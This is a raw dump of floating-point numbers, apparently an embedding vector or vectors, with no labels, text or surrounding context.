-0.010530824773013592, -0.0051582567393779755, -0.0055831847712397575, 0.012947372160851955, 0.023633388802409172, 0.004995675757527351, -0.0025292455684393644, 0.006078318227082491, -0.004873740021139383, 0.009865720756351948, 0.010523434728384018, -0.022923944517970085, -0.009717918932437897, -0.012592650018632412, 0.026559850201010704, 0.004023883957415819, 0.020559126511216164, 0.006603012327104807, 0.008232519030570984, -0.021874556317925453, -0.005716206040233374, -0.018031729385256767, 0.01138807088136673, -0.020913848653435707, 0.00872765202075243, 0.007120315916836262, 0.0013717785477638245, -0.002629011170938611, -0.026604190468788147, -0.013693767599761486, -0.013427725993096828, 0.0016895508160814643, 0.006181779317557812, -0.012208366766571999, 0.004164294805377722, -0.00630371505394578, -0.0070870607160031796, 0.007648704573512077, 0.01285869162529707, -0.015533890575170517, 0.02058868668973446, -0.009178445674479008, -0.025288760662078857, 0.01364203728735447, -0.0015629961853846908, -0.009097155183553696, 0.02140159346163273, -0.008217738941311836, 0.03239799290895462, 0.006747118197381496, 0.00015692315355408937, 0.00606723316013813, -0.02190411649644375, 0.0016895508160814643, 0.008454220369458199, 0.0020488922018557787, -0.021549394354224205, 0.0008729499531909823, -0.008454220369458199, -0.017218822613358498, -0.011048128828406334, -0.00739744259044528, -0.013619867153465748, -0.037630148231983185, -0.014432772994041443, 0.01927325688302517, 0.011868424713611603, 0.014477113261818886, -0.013841568492352962, -0.011129419319331646, -0.004888520110398531, 0.010434754192829132, 0.01389329880475998, 0.0117280138656497, 0.011543262749910355, -0.023884650319814682, 0.02933850884437561, 0.01044953428208828, 0.01732228323817253, 0.03384644165635109, 0.0025569582358002663, -0.00032008165726438165, 0.010146542452275753, 0.003621125826612115, 0.0015168082900345325, -0.004592917859554291, -0.012082736007869244, -0.02239185944199562, 0.00026627283659763634, -0.012304438278079033, -0.02302740514278412, -0.004895910155028105, 0.00800342671573162, -0.021844996139407158, -0.009991351515054703, 0.011158979497849941, -0.011439802125096321, 0.0019306512549519539, 0.01313951425254345, 0.02552524209022522, -0.001400414970703423, -0.004123649559915066, 0.005102831404656172, -0.001943583833053708, 0.021135549992322922, -0.004212330095469952, -0.0050326259806752205, 0.020160064101219177, 0.002645638771355152, -0.010516044683754444, 0.0020451971795409918, -0.011173759587109089, -0.009267126210033894, -0.022746581584215164, -0.002274288795888424, 0.01307300291955471, 0.007061195559799671, -0.011025958694517612, 0.005579489748924971, -0.0038243522867560387, -0.016568498685956, 0.018105629831552505, 0.009621848352253437, -0.012385728769004345, -0.009038034826517105, -0.006724948063492775, -0.025939084589481354, 0.012274877168238163, -0.005372568499296904, 0.01297693233937025, -0.008136448450386524, 0.000662795384414494, 0.0098509406670928, 0.00966618862003088, 0.012112296186387539, 0.0140780508518219, -0.008491170592606068, -0.011210709810256958, -0.010752527043223381, -0.0039980183355510235, 0.00724225165322423, -0.010501264594495296, 0.018992435187101364, -0.023677729070186615, -0.0010613963240757585, 0.0070870607160031796, -0.0037227391730993986, -0.025052279233932495, 0.019169796258211136, -0.018844634294509888, 0.03470368683338165, -0.010065251961350441, -0.009488827548921108, -0.011447192169725895, 0.006344360299408436, -0.00552036939188838, 0.017913488671183586, 0.004064529202878475, 0.012836521491408348, -0.002507075434550643, -0.014987027272582054, -0.032072827219963074, -0.011092469096183777, -0.006761898286640644, -0.003979543223977089, 0.004363826010376215, -0.01794304884970188, 0.014521453529596329, -0.01138807088136673, -0.0010687863687053323, 0.005346703343093395, -0.009015864692628384, -0.0011343731312081218, -0.01720404252409935, -0.009703138843178749, 0.006684302818030119, 0.01526784896850586, -0.002379596931859851, -0.0136050870642066, 0.025613922625780106, 0.006610402371734381, -0.010109592229127884, 0.008114278316497803, -0.0029985138680785894, -0.006377615500241518, 0.006942954380065203, 0.004060834180563688, -0.016790200024843216, -0.00975487008690834, 0.010560384951531887, 0.028688184916973114, -0.01676063984632492, 0.027357975021004677, -0.006510636303573847, 0.0023204765748232603, -0.012297048233449459, 0.023308226838707924, -0.0038280473090708256, -0.014868786558508873, 0.003741214284673333, 0.009895280934870243, 0.006510636303573847, -0.0018004016019403934, 0.006724948063492775, 0.029175927862524986, 0.035501811653375626, -0.022421419620513916, 0.0008868063450790942, 0.003765231929719448, -0.007427003234624863, 0.0035453778691589832, 0.011144199408590794, 0.00714618107303977, 0.013516406528651714, -0.012407898902893066, -0.017307503148913383, 0.004186464939266443, -0.015356529504060745, -0.010213052853941917, 0.017100581899285316, 0.02057390660047531, 0.0009186759125441313, -0.004456202033907175, -0.013597697019577026, -0.01869683340191841, -0.001684008282609284, 0.005106526426970959, 0.0015565298963338137, -0.008461610414087772, -0.007936916314065456, 0.014432772994041443, 0.007238556630909443, -0.003373559098690748, -0.01266655046492815, 0.016184216365218163, 0.008557680994272232, -0.009777040220797062, -0.006965124513953924, 0.026234686374664307, 0.009784430265426636, 0.04167989641427994, -0.0055868797935545444, 0.005276497453451157, 0.009444487281143665, 0.010464314371347427, -0.004674208350479603, -0.02027830481529236, -0.002874730620533228, -0.01950974017381668, 0.03363952040672302, -0.0203226450830698, -0.008276859298348427, -0.008335979655385017, -0.006772983353585005, -0.010205662809312344, -0.0070907557383179665, -0.004023883957415819, 0.00028451703838072717, -0.006772983353585005, 0.005982247646898031, 0.0033717115875333548, -0.008735042065382004, 0.01188320480287075, -0.0026031460147351027, 0.003772621974349022, 0.024431513622403145, -0.007663484662771225, 0.008372929878532887, -0.0019214136991649866, 0.008661141619086266, 0.015918172895908356, -0.027387535199522972, -0.007541548926383257, 0.026131225749850273, 0.02883598580956459, 0.016420697793364525, 0.00018359662499278784, 0.006181779317557812, -0.006211339496076107, 0.011698453687131405, -0.020233964547514915, 0.0036155832931399345, 0.005391043610870838, 0.011942325159907341, -0.007138791028410196, 0.03219107165932655, 0.02283526211977005, -0.0032239104621112347, -0.00784823577851057, -0.008062548004090786, 0.00838031992316246, -0.002625316148623824, -0.014964857138693333, -0.012518749572336674, -0.010974228382110596, -0.0008955820230767131, -0.006872748956084251, -0.005742071196436882, -0.0010678626131266356, 0.0033550839871168137, 0.019672321155667305, -0.026293808594346046, 0.014033710584044456, -0.007231166586279869, 0.006817323621362448, -0.012577869929373264, -0.008084718137979507, 0.007959086447954178, -0.0026678091380745173, -0.06284500658512115, -0.01257047988474369, 0.0048515694215893745, 0.00031869602389633656, -0.019007215276360512, 0.0037837070412933826, -0.006503246258944273, -0.004171684850007296, 0.006144829094409943, 0.011587603017687798, -0.00972530897706747, 0.016125096008181572, -0.01600685343146324, -0.024195032194256783, -0.0011223643086850643, -0.0022410335950553417, -0.014765325002372265, 0.0050732712261378765, -0.0021615903824567795, 0.010272173210978508, -0.0098509406670928, 0.00769304484128952, 0.000025951787392841652, 0.006181779317557812, 0.007567414082586765, 0.0070907557383179665, 0.02307174541056156, -0.021475493907928467, -0.012555699795484543, -0.010767307132482529, 0.0016091839643195271, -0.019435837864875793, 0.005838141776621342, -0.0159625131636858, 0.005498199257999659, 0.011210709810256958, 0.011957105249166489, -0.0106342863291502, 0.016302457079291344, -0.000018301927411812358, -0.01732228323817253, 0.0029541736003011465, -0.022761361673474312, -0.029796693474054337, -0.024298492819070816, 0.03910816088318825, -0.0010807951912283897, -0.008195568807423115, -0.002037807134911418, -0.01166889350861311, 0.024239372462034225, 0.0033088962081819773, 0.01677541993558407, -0.0002958330442197621, 0.0012341388501226902, 0.010656456463038921, -0.027387535199522972, -0.004230805207043886, -0.025732163339853287, 0.015031367540359497, -0.00340127176605165, -0.011025958694517612, -0.020633026957511902, 0.016051193699240685, -0.0007112925522960722, 0.03742322698235512, 0.021165110170841217, -0.007231166586279869, 0.02933850884437561, 0.01681976020336151, -0.012718280777335167, -0.009555337950587273, 0.014491893351078033, 0.011661503463983536, -0.018282990902662277, -0.03363952040672302, -0.017292723059654236, 0.01492051687091589, 0.0028137625195086002, 0.02115033008158207, -0.0026068410370498896, -0.007996036671102047, -0.0038760825991630554, -0.005682950373739004, -0.009961791336536407, 0.0002618849975988269, -0.010619506239891052, -0.028806425631046295, 0.005830751731991768, 0.0061928643845021725, -0.007818675599992275, -0.02571738325059414, -0.028821205720305443, 0.025495681911706924, -0.01776568591594696, -0.016036413609981537, 0.006972514558583498, -0.015430429950356483, 0.021756315603852272, 0.0006189169362187386, -0.003417899366468191, -0.008557680994272232, 0.01364203728735447, -0.014477113261818886, -0.0005847379215992987, 0.02270224131643772, -0.02194845676422119, -0.008986304514110088, -0.01707102172076702, 0.01950974017381668, 0.011210709810256958, 0.00265857158228755, 0.005036321002990007, -0.0007011312409304082, 0.0014586116885766387, 0.0028470177203416824, 0.00023521152616012841, -0.032368432730436325, 0.016346797347068787, -0.021593734622001648, -0.023160425946116447, 0.011994055472314358, 0.019687101244926453, 0.01819431036710739, -0.00002559094355092384, 0.009185835719108582, 0.012740450911223888, 0.002204083139076829, -0.009799210354685783, 0.0024886003229767084, -0.002499685389921069, 0.016967561095952988, -0.00962923839688301, 0.0024479550775140524, -0.015918172895908356, -0.007227471563965082, 0.011240269988775253, -0.006240899674594402, -0.008469000458717346, -0.004009103402495384, -0.008749822154641151, -0.0250227190554142, -0.013021272607147694, 0.000625845103058964, -0.004788754042237997, -0.021372033283114433, -0.006606707349419594, 0.006170694250613451, 0.011107249185442924, 0.004796144086867571, 0.005742071196436882, 0.014558403752744198, -0.015903392806649208, -0.03511752933263779, -0.013309485279023647, 0.014935296960175037, -0.023751629516482353, -0.013132124207913876, 0.0030520916916429996, -0.00043301089317537844, -0.02446107380092144, 0.008890233002603054, -0.027254514396190643, -0.029501089826226234, -0.018489912152290344, 0.011964495293796062, -0.01163194328546524, 0.011469362303614616, 0.0003050706291105598, -0.010922498069703579, -0.007877795957028866, -0.011550652794539928, 0.021105989813804626, -0.01270350068807602, 0.02045566588640213, -0.01039041392505169, 0.0004272374208085239, 0.004374911077320576, 0.004748108796775341, -0.010656456463038921, -0.015238288789987564, 0.030506137758493423, 0.006174389272928238, -0.01429236214607954, -0.013087783008813858, 0.022672681137919426, 0.00957011803984642, -0.011809304356575012, -0.007401137612760067, -0.010080032050609589, -0.022258838638663292, -0.003658076049759984, 0.010937278158962727, 0.03210238739848137, -0.008276859298348427, -0.0014696967555209994, 0.0004886672249995172, 0.01538608968257904, 0.02453497424721718, 0.02984103374183178, 0.016731079667806625, -0.008239909075200558, -0.001832733047194779, -0.0004558738728519529, 0.006994685158133507, -0.00920061580836773, 0.01619899645447731, 0.0068690539337694645, 0.012843911536037922, 0.007031635381281376, 0.008816332556307316, 0.0036396009381860495, -0.00012539995077531785, -0.006285239942371845, 0.00935580674558878, 0.005099136382341385, 0.015622571110725403, -0.0008928107563406229, -0.007840845733880997, 0.009437097236514091, 0.010811647400259972, -0.026249468326568604, 0.0120383957400918, -0.022923944517970085, 0.0268997922539711, 0.017617885023355484, 0.008845892734825611, 0.00172465352807194, 0.015083097852766514, 0.004511627368628979, 0.013095173053443432, 0.0029855812899768353, -0.019805341958999634, -0.002575433347374201, -0.008860672824084759, 0.00014757011376786977, 0.01107768900692463, -0.004234500229358673, 0.02014528401196003, -0.005904652178287506, -0.004799839109182358, 0.025613922625780106, -0.013834178447723389, -0.00645890599116683, 0.01059733610600233, -0.010855987668037415, -0.030801739543676376, -0.011949715204536915, -0.00506957620382309, -0.023855090141296387, -0.0162581168115139, -0.011838864535093307, -0.003155552549287677, 0.03077217936515808, -0.012178806588053703, -0.014373652637004852, 0.023234326392412186, -0.023441247642040253, 0.014713594689965248, 0.014336702413856983, -0.0033864916767925024, -0.013346435502171516, 0.0017717651790007949, 0.005191511940211058, -0.020307864993810654, 0.006518026348203421, -0.022687461227178574, 0.021283352747559547, -0.00029490928864106536, 0.023869870230555534, -0.019036775454878807, -0.002180065494030714, 0.0028802731540054083, -0.012060565873980522, -0.023928990587592125, -0.0065254163928329945, 0.021416373550891876, 0.0018216479802504182, -0.005010455846786499, 0.02409157156944275, -0.008712871931493282, -0.012903031893074512, 0.0064108707010746, 0.0075156837701797485, 0.010220442898571491, 0.005808581598103046, 0.009030644781887531, -0.047828420996665955, -0.007907356135547161, 0.02320476621389389, -0.023736849427223206, -0.02183021605014801, 0.00046349488548003137, 0.00743069825693965, -0.0037504518404603004, 0.006510636303573847, -0.009777040220797062, 0.008299029432237148, -0.0075193787924945354, 0.02332300692796707, 0.0109446682035923, 0.01807606965303421, 0.014950077049434185, 0.0234560277312994, -0.01260743010789156, 0.0018234954914078116, -0.02753533609211445, 0.008875452913343906, 0.005919432267546654, -0.005091746337711811, -0.008269469253718853, -0.006462601013481617, 0.002739862073212862, -0.0020969274919480085, -0.0011288305977359414, 0.0034068142995238304, 0.022184938192367554, -0.013671597465872765, -0.025879964232444763, 0.0010484637459740043, 0.0014724680222570896, -0.023234326392412186, -0.009998741559684277, 0.015548670664429665, 0.01344989612698555, -0.0011528482427820563, -0.014248021878302097, 0.00022170158626977354, 0.0004771202802658081, -0.019243696704506874, -0.021475493907928467, -0.013235584832727909, -0.019155016168951988, 0.00659931730479002, -0.009614458307623863, 0.0055868797935545444, -0.0028765781316906214, -0.002237338572740555, 0.0148613965138793, 0.007966476492583752, 0.010767307132482529, -0.004507932346314192, 0.026441609486937523, 0.014772715047001839, 0.02651550993323326, 0.005479724146425724, -0.011609773151576519, -0.02539222128689289, 0.02426893264055252, 0.012282268144190311, 0.010907717980444431, -0.0007228395552374423, -0.007186826318502426, 0.02214059792459011, 0.030979100614786148, 0.0016553718596696854, 0.01826821081340313, -0.007892576046288013, -0.029013346880674362, -0.0023611218202859163, 0.007305067032575607, 0.0018502844031900167, 0.004932860378175974, 0.014757934957742691, 0.0070870607160031796, -0.02070692740380764, -0.026559850201010704, -0.008520730771124363, -0.004389691166579723, -0.0017754602013155818, 0.0019361937884241343, -0.0259538646787405, 0.003604498226195574, -0.036122579127550125, -0.005649695172905922, 0.0026031460147351027, -0.014004150405526161, -0.012718280777335167, -0.0017597563564777374, -0.0017024833941832185, 0.008121668361127377, -0.02583562396466732, -0.008779382333159447, 0.020130503922700882, -0.010833817534148693, -0.00878677237778902, 0.013309485279023647, 0.009991351515054703, -0.013730717822909355, 0.015859052538871765, 0.011683673597872257, 0.0037430617958307266, 0.00439338618889451, 0.02233273908495903, 0.018815074115991592, -0.00487743504345417, 0.0006498627481050789, -0.013619867153465748, -0.025599142536520958, -0.016997121274471283, 0.0009343798155896366, -0.01964276097714901, 0.003397576743736863, -0.008047767914831638, 0.0048515694215893745, 0.007083365693688393, -0.002784202340990305, -0.012932592071592808, 0.01404110062867403, 0.025037499144673347, -0.006961429491639137, -0.002111707581207156, -0.006902309134602547, 0.025791283696889877, -0.0030465491581708193, -0.013767668046057224, -0.012053175829350948, 0.0272101741284132, -0.005646000150591135, -0.00413103960454464, -0.022938724607229233, -0.014159341342747211, -0.00046395676326937973, -0.023795969784259796, -0.0005288506508804858, -0.012851301580667496, -0.009038034826517105, -0.0009209853014908731, -0.0045227124355733395, 0.004703768528997898, -0.0070501104928553104, 0.002671504160389304, 0.01914023607969284, 0.003120449837297201, -0.01726316288113594, 0.006547586526721716, -0.016849320381879807, -0.017750905826687813, 0.014647084288299084, 0.0006586384261026978, -0.013124734163284302, 0.0009570118272677064, -0.012555699795484543, 0.001926956232637167, -0.013146904297173023, -0.014004150405526161, -0.0034123568329960108, 0.0032645557075738907, -0.004918080288916826, -0.006857968866825104, 0.005867701955139637, 0.013479456305503845, -0.004408166278153658, 0.001582395052537322, -0.008202958852052689, -0.02289438433945179, -0.011188539676368237, 0.003120449837297201, -0.007833455689251423, -0.006813628599047661, -0.014565793797373772, -0.010745136998593807, 0.008461610414087772, 0.024815797805786133, 0.02639726921916008, 0.025244420394301414, -0.00270660687237978, -0.018179530277848244, 0.005339313298463821, -0.016804980114102364, 0.001420737593434751, 0.011225489899516106, 0.014610134065151215, -0.024372393265366554, -0.00001929785321408417, -0.004600307904183865, 0.005206292029470205, 0.014299752190709114, 0.023928990587592125, -0.0012581564951688051, -0.00192326121032238, -0.013287315145134926, -0.0030687192920595407, -0.012031005695462227, 0.016627619042992592, -0.006444125901907682, -0.0007814980926923454, 0.019923582673072815, 0.005125001538544893, 0.007079670671373606, -0.0042197201400995255, 0.01801694929599762, 0.0048552644439041615, 0.002054434735327959, 0.017529204487800598, 0.002983733778819442, -0.0016581431264057755, -0.0026770466938614845, -0.0025181605014950037, -0.0007154495106078684, -0.016997121274471283, 0.0024959903676062822, -0.01389329880475998, 0.004507932346314192, -0.010974228382110596, 0.0037633844185620546, -0.01888897456228733, -0.020677367225289345, 0.005442773923277855, 0.008550290949642658, 0.014033710584044456, -0.009858330711722374, 0.0203226450830698, 0.0013145055854693055, -0.011269830167293549, -0.009799210354685783, -0.009961791336536407, 0.013730717822909355, -0.007567414082586765, 0.009015864692628384, -0.009651408530771732, 0.012164026498794556, 0.00015680768410675228, 0.006639962550252676, -0.010641676373779774, 0.0047296336852014065, -0.011957105249166489, 0.015607791021466255, -0.020100943744182587, 0.003781859530135989, -0.012193586677312851, -0.016938000917434692, -0.005487114191055298, 0.011890594847500324, 0.00962923839688301, -0.011055518873035908, -0.0101613225415349, 0.0077226050198078156, -0.009769650176167488, -0.009215395897626877, -0.0212685726583004, 0.006972514558583498, -0.005054796114563942, -0.0029449360445141792, -0.01865249313414097, -0.0018733784090727568, -0.003120449837297201, 0.012673940509557724, 0.014462333172559738, 0.0017976303352043033, -0.009924841113388538, 0.0022244059946388006, -0.007504598703235388, 0.007308762054890394, 0.022288398817181587, 0.007179436273872852, -0.009644018486142159, -0.011447192169725895, -0.008757212199270725, -0.007275506854057312, -0.00034248275915160775, 0.002021179534494877, -0.018667273223400116, -0.03346215933561325, 0.009584898129105568, -0.0010891089914366603, 0.009680968709290028, 0.017913488671183586, -0.03884211555123329, -0.019421057775616646, 0.0052949730306863785, 0.01838645152747631, -0.006048758048564196, 0.0016830845270305872, 0.019155016168951988, -0.0044783721677958965, -0.010094812139868736, 0.031688544899225235, -0.01865249313414097, 0.012430069036781788, -0.013036052696406841, 0.0064810761250555515, 0.018593372777104378, 0.0015953276306390762, -0.005997027736157179, 0.02202235721051693, 0.02409157156944275, -0.0015980988973751664, 0.005730986129492521, 0.0066177924163639545, -0.0066177924163639545, 0.018120409920811653, 0.006917089223861694, 0.0015491398517042398, -0.007744775153696537, 0.017795247957110405, 0.0012433764059096575, 0.017351843416690826, 0.012644380331039429, -0.015356529504060745, 0.0016950933495536447, 0.01123287994414568, -0.01832733117043972, -0.018933314830064774, 0.011203319765627384, -0.0056681702844798565, -0.01301388256251812, -0.026116445660591125, -0.005915737245231867, 0.013959809206426144, 0.016716299578547478, -0.015312189236283302, -0.003192502772435546, -0.01888897456228733, 0.016686739400029182, 0.0049069952219724655, -0.0017791552236303687, -0.02415069192647934, 0.011085079051554203, 0.00010022758942795917, 0.0008687930530868471, -0.006684302818030119, 0.0032811835408210754, 0.006178084295243025, 0.006979904603213072, -0.0030077514238655567, 0.008638971485197544, 0.0067027779296040535, -0.032131947576999664, -0.0017532900674268603, 0.018785513937473297, -0.014477113261818886, -0.01733706332743168, -0.0022244059946388006, -0.0030520916916429996, -0.010464314371347427, 0.021859776228666306, 0.0017163397278636694, -0.004674208350479603, 0.000009353035238746088, 0.01104073878377676, 0.02777181752026081, 0.001198112266138196, -0.004766583908349276, 0.01507570780813694, 0.012740450911223888, -0.0215789545327425, -0.012999102473258972, -0.0036636185832321644, -0.020810388028621674, -0.016671959310770035, 0.01758832484483719, 0.016538938507437706, 0.008505950681865215, -0.0026419437490403652, 0.019421057775616646, -0.023988110944628716, -0.005701425485312939, -0.018430791795253754, -0.0034031192772090435, -0.0016729232156649232, -0.011380680836737156, -0.017277942970395088, 0.013132124207913876, -0.022554440423846245, -0.00891240406781435, 0.004404471255838871, -0.001002275850623846, -0.000037960620829835534, -0.002139420248568058, -0.006510636303573847, 0.007190521340817213, -0.0064404308795928955, 0.0049919807352125645, 0.036240819841623306, -0.010900327935814857, -0.009636628441512585, -0.011691063642501831, -0.000028708622267004102, 0.00931885652244091, -0.00030414684442803264, -0.02295350469648838, -0.014188901521265507, 0.012031005695462227, -0.004932860378175974, 0.015193948522210121, -0.014913126826286316, -0.028318682685494423, -0.00591204222291708, 0.00575685128569603, -0.0012803266290575266, -0.01869683340191841, -0.005136086605489254, 0.002054434735327959, -0.004670513328164816, 0.02051478624343872, -0.02890988625586033, -0.013723327778279781, -0.013863738626241684, 0.006883834023028612, 0.004227110184729099, -0.028880326077342033, 0.007227471563965082, 0.02165285497903824, 0.011594993062317371, 0.016302457079291344, -0.014817055314779282, -0.03059481829404831, 0.014344092458486557, 0.02389943040907383, -0.008831112645566463, -0.0014281276380643249, -0.004448811989277601, 0.01231921836733818, 0.015918172895908356, 0.021741535514593124, 0.0012230537831783295, 0.014617524109780788, -0.000712216307874769, 0.009836160577833652, -0.012215756811201572, -0.003920422866940498, 0.022051917389035225, -0.013775058090686798, -0.011624553240835667, -0.009673578664660454, 0.0079812565818429, 0.035560932010412216, -0.006894919089972973, 0.008831112645566463, 0.0007828837260603905, 0.005923127289861441, -0.026633750647306442, 0.014595353975892067, 0.01226748712360859, -0.01310995314270258, -0.009584898129105568, -0.013154294341802597, 0.02070692740380764, -0.00975487008690834, 0.008483780547976494, -0.002146810293197632, -0.007415918167680502, 0.00878677237778902, 0.016982341185212135, 0.007105535827577114, -0.016302457079291344, 0.003658076049759984, -0.0022484236396849155, 0.008439440280199051, 0.0018281142693012953, 0.016287676990032196, -0.018489912152290344, -0.008616801351308823, -0.005394738633185625, -0.025983424857258797, -0.0014715442666783929, -0.005099136382341385, 0.022539660334587097, -0.0128217414021492, -0.02457931637763977, 0.01739618368446827, -0.00037619986687786877, 0.009547947905957699, 0.028496043756604195, 0.002217015717178583, 0.010612116195261478, 0.004212330095469952, 0.019302817061543465, 0.006285239942371845, 0.0010041233617812395, -0.002845170209184289, 0.0038428273983299732, 0.014469723217189312, 0.013871128670871258, 0.01871161349117756, 0.0007403909112326801, 0.010213052853941917, -0.012082736007869244, -0.01851947233080864, -0.0057199010625481606, 0.0016119552310556173, -0.014048490673303604, 0.015681691467761993, -0.007245946675539017, -0.0026271636597812176, 0.003283031051978469, -0.0005283887730911374, -0.032368432730436325, -0.0027084543835371733, -0.02653029002249241, 0.014248021878302097, -0.005040016025304794, -0.02947152964770794, -0.01025739312171936, -0.0006997456075623631, -0.005904652178287506, -0.011425021104514599, 0.014307142235338688, -0.011461972258985043, -0.01226748712360859, 0.0016313540982082486, -0.016612838953733444, -0.01557823084294796, 0.017869148403406143, -0.00201748451218009, 0.018534252420067787, 0.005006760824471712, -0.005786411464214325, -0.004201245028525591, 0.005509284324944019, -0.009525777772068977, -0.002773117274045944, -0.0025015329010784626, -0.017750905826687813, 0.000512684928253293, 0.014654474332928658, -0.015977293252944946, -0.005775326397269964, -0.005221072118729353, 0.026988472789525986, 0.02171197533607483, 0.002804524963721633, -0.002874730620533228, -0.001659990637563169, -0.043010108172893524, 0.017233602702617645, 0.01376027800142765, -0.011299390345811844, 0.0061522191390395164, 0.024682777002453804, -0.001805020379833877, -0.006377615500241518, -0.021120769903063774, 0.00184936064761132, -0.014972247183322906, -0.028732525184750557, -0.007892576046288013, 0.004323180764913559, -0.01339077576994896, 0.0026382487267255783, -0.011299390345811844, 0.008638971485197544, -0.00310382223688066, -0.023943770676851273, 0.002665961626917124, -0.004378606099635363, 0.011255050078034401, -0.01135112065821886, 0.002438717521727085, 0.01927325688302517, 0.02265790104866028, 0.0020285695791244507, 0.008446830324828625, -0.005250632297247648, 0.022007577121257782, -0.013715937733650208, 0.003070567036047578, 0.0005741147324442863, -0.02621990628540516, 0.011646723374724388, -0.004119954537600279, -0.014935296960175037, 0.022362299263477325, -0.004012798424810171, 0.0017763839568942785, 0.004751803819090128, 0.030077515169978142, 0.0018807684537023306, 0.012806961312890053, 0.013841568492352962, -0.009762260131537914, 0.0033292188309133053, -0.017292723059654236, 0.026382489129900932, -0.021564174443483353, 0.00211909762583673, 0.0027454046066850424, -0.018120409920811653, 0.006425650790333748, -0.01454362366348505, -0.0256434828042984, 0.009178445674479008, 0.01701190136373043, 0.010745136998593807, 0.002061824779957533, -0.006396090611815453, 0.03319611772894859, 0.010626896284520626, -0.001335752080194652, -0.019302817061543465, -0.015622571110725403, -0.004844179376959801, 0.0011888747103512287, -0.01631723716855049, -0.00916366558521986, -0.011705843731760979, -0.01029434334486723, 0.005908347200602293, 0.01851947233080864, 0.014839226379990578, -0.01291781198233366, 0.029353288933634758, -0.005657085217535496, -0.003678398672491312, 0.0031186023261398077, 0.006074623204767704, 0.001802249113097787, 0.005250632297247648, -0.014942687004804611, -0.028126541525125504, 0.011550652794539928, 0.02814132161438465, 0.019361937418580055, -0.004142124671489, 0.014159341342747211, -0.00027666508685797453, 0.012282268144190311, -0.005646000150591135, 0.02871774509549141, -0.00011800990614574403, -0.006107878405600786, 0.01602163352072239, 0.0184455718845129, 0.00016500601486768574, -0.027668356895446777, 0.003428984433412552, -0.0003006827610079199, -0.002568043302744627, 0.0021819130051881075, 0.015799932181835175, -0.0008757212781347334, 0.012341388501226902, 0.011151589453220367, -0.00021119385201018304, -0.009769650176167488, 0.0038354373537003994, 0.013590306974947453, -0.014905736781656742, -0.025613922625780106, 0.008469000458717346, 0.01569647155702114, -0.0031370774377137423, 0.00841727014631033, -0.007075975649058819, -0.016938000917434692, 0.01921413652598858, -0.00047665840247645974, -0.011550652794539928, -0.005076966248452663, 0.01460274402052164, -0.006780373398214579, -0.0029708012007176876, -0.005993332713842392, -0.011343730613589287, 0.004526407457888126, -0.016154656186699867, -0.0029985138680785894, 0.023426467552781105, 0.015504330396652222, -0.007818675599992275, -0.025421781465411186, 0.020411325618624687, 0.0005616440321318805, -0.0012304438278079033, 0.014321922324597836, 0.002983733778819442, 0.00467790337279439, -0.010375633835792542, -0.006821018643677235, -0.012082736007869244, -0.012651770375669003, 0.005431688856333494, 0.012947372160851955, 0.01029434334486723, -0.0021209451369941235, -0.0007634848007000983, -0.0021578953601419926, 0.006835798732936382, 0.013124734163284302, -0.012836521491408348, 0.0028728831093758345, -0.01501658745110035, 0.0004822009359486401, 0.0218893364071846, 0.0037910970859229565, 0.01738140359520912, -0.000985648250207305, -0.00838031992316246, -0.001954668899998069, 0.0005810428992845118, -0.0009810294723138213, 0.006636267527937889, 0.02277614176273346, -0.0069503444246947765, 0.023943770676851273, -0.007988646626472473, -0.012503969483077526, 0.006880139000713825, -0.0004103788814973086, 0.018815074115991592, -0.009178445674479008, 0.023559488356113434, -0.00023174744274001569, 0.0011824084213003516, 0.005531454458832741, -0.009111935272812843, -0.03428984433412552, 0.015341749414801598, 0.0023334091529250145, -0.0015140370232984424, 0.024667996913194656, -0.018238650634884834, -0.0009283754043281078, 0.0020285695791244507, -0.021667635068297386, 0.0021449627820402384, -0.020972969010472298, -0.0068247136659920216, -0.006396090611815453, -0.0203226450830698, 0.010774697177112103, 0.01069340668618679, 0.012289658188819885, 0.02078082785010338, 0.01776568591594696, 0.004670513328164816, -0.009208005852997303, -0.03907860070466995, 0.004792449064552784, -0.011957105249166489, -0.00841727014631033, 0.01297693233937025, 0.018667273223400116, -0.03671378269791603, -0.007973866537213326, 0.01123287994414568, 0.011432412080466747, -0.0055425395257771015, -0.015297409147024155, 0.012437459081411362, 0.0021652854047715664, 0.01807606965303421, 0.02151983417570591, 0.008276859298348427, 0.0065808421932160854, 0.003961068112403154, -0.008890233002603054, 0.0037098065949976444, 0.006699082907289267, 0.0005524064181372523, 0.007574804127216339, 0.011846254579722881, -0.012969542294740677, 0.017543984577059746, 0.0024922953452914953, -0.014765325002372265, -0.021741535514593124, -0.010397803969681263, -0.04108869284391403, 0.004456202033907175, -0.004903300199657679, 0.008868062868714333, 0.004958725534379482, 0.017440523952245712, 0.010116982273757458, 0.0017708414234220982, 0.0038723875768482685, 0.01677541993558407, 0.003772621974349022, 0.02840736322104931, 0.002135725226253271, -0.002571738325059414, 0.010375633835792542, -0.012984322383999825, 0.004023883957415819, 0.0493951141834259, 0.0012988017406314611, 0.004940250422805548, 0.002804524963721633, 0.015785152092576027, 0.018933314830064774, -0.008816332556307316, 0.006229814607650042, 0.008550290949642658, -0.013375995680689812, -0.0008447754080407321, -0.009038034826517105, 0.0021505053155124187, 0.002723234472796321, -0.006562367081642151, 0.004312095697969198, 0.02140159346163273, 0.016568498685956, -0.018342111259698868, -0.02958977036178112, 0.0034142043441534042, 0.007648704573512077, 0.017174482345581055, -0.011838864535093307, 0.003887167666107416, 0.01865249313414097, 0.013959809206426144, 0.024239372462034225, -0.0019251087214797735, -0.005431688856333494, 0.015504330396652222, -0.009296686388552189, -0.004733328707516193, 0.005047406069934368, 0.003432679455727339, 0.007330932188779116, 0.005468639079481363, 0.032486673444509506, 0.01532696932554245, -0.004707463551312685, -0.0014706205110996962, -0.0005422451067715883, 0.010116982273757458, 0.006170694250613451, 0.00900847464799881, 0.01927325688302517, 0.009740089997649193, 0.005191511940211058, 0.014817055314779282, 0.008528120815753937, 0.011809304356575012, -0.005575794726610184, 0.007663484662771225, 0.010745136998593807, 0.0064108707010746, 0.0221997182816267, 0.018859414383769035, -0.016745859757065773, -0.005516674369573593, -0.00014491431647911668, 0.008993694558739662, -0.004330570809543133, -0.014684034511446953, -0.008978914469480515, -0.0412956140935421, 0.010346073657274246, -0.01029434334486723, 0.019849682226777077, -0.0013477609027177095, 0.03420116379857063, -0.012407898902893066, -0.00857246108353138, -0.01569647155702114, 0.0005621059099212289, -0.0036359059158712626, -0.03210238739848137, -0.00270660687237978, -0.00743069825693965, -0.0017052546609193087, -0.004607697948813438, 0.01982012204825878, -0.005383653566241264, 0.016686739400029182, -0.0018900060094892979, -0.03346215933561325, -0.01563735119998455, -0.024786237627267838, -0.009208005852997303, 